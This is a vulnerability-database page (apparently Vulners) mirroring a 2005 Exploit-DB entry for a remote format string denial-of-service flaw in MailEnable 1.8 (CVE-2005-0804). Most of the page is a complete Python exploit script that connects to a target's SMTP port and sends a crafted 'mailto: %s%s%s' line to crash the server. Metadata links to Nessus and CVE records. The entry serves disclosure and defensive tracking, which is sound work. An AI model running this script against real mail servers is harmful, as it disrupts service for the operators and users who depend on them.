Lucene search
+L

MailEnable 1.8 - Remote Format String Denial of Service

🗓️ 17 Mar 2005 00:00:00Reported by Tal ZeltzerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 51 Views

MailEnable 1.8 has a remote format string vulnerability leading to Denial of Service.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
MailEnable < 1.8.1 mailto Remote Format String Overflow
17 Mar 200500:00
nessus
nessus
Tenable Nessus
MailEnable Standard SMTP mailto: Request Format String
18 Mar 200500:00
nessus
cve
CVE
CVE-2005-0804
20 Mar 200505:00
cve
cvelist
Cvelist
CVE-2005-0804
20 Mar 200505:00
cvelist
euvd
EUVD
EUVD-2005-0805
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-0804
2 May 200504:00
nvd
                                                                                                                                                                                                                                                               ##################################################################
#                                                                #
#               See-security Technologies ltd.                   #
#                                                                #
#                http://www.see-security.com                     #
#                                                                #
##################################################################
#                                                                #
#          MailEnable 1.8 Format String DoS exploit              #
#                                                                #
#                Discovered by Mati Aharoni                      #
#                                                                #
#                   Coded by tal zeltzer                         #
#                                                                #
##################################################################


import sys
import time
import socket


def PrintLogo():
	print "##################################################################"
	print "#                                                                #"
	print "#               See-security Technologies ltd.                   #"
	print "#                                                                #"
	print "#                http://www.see-security.com                     #"
	print "#                                                                #"
	print "##################################################################"
	print "#"+" "*64+"#"
	print "#          MailEnable 1.8 Format String DoS exploit              #"
	print "#"+" "*64+"#"
	print "#                Discovered by Mati Aharoni                      #"
	print "#                                                                #"
	print "#                   Coded by tal zeltzer                         #"
	print "#"+" "*64+"#"
	print "#"*66+"\n"


PrintLogo()
if (len(sys.argv) != 2):
	print "\n\n"
	print sys.argv[0] + " [Target Host]"
	sys.exit()
sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[-] Connecting to " + sys.argv[1]
sSmtpSocket.connect((sys.argv[1],25))
print "[-] Connected to " + sys.argv[1]
print "[-] Sending malformed packet"
sSmtpSocket.send("mailto: %s%s%s\r\n")
sSmtpSocket.close()
print "[-] Malformed packet sent"


# milw0rm.com [2005-03-17]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2005 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.04214
51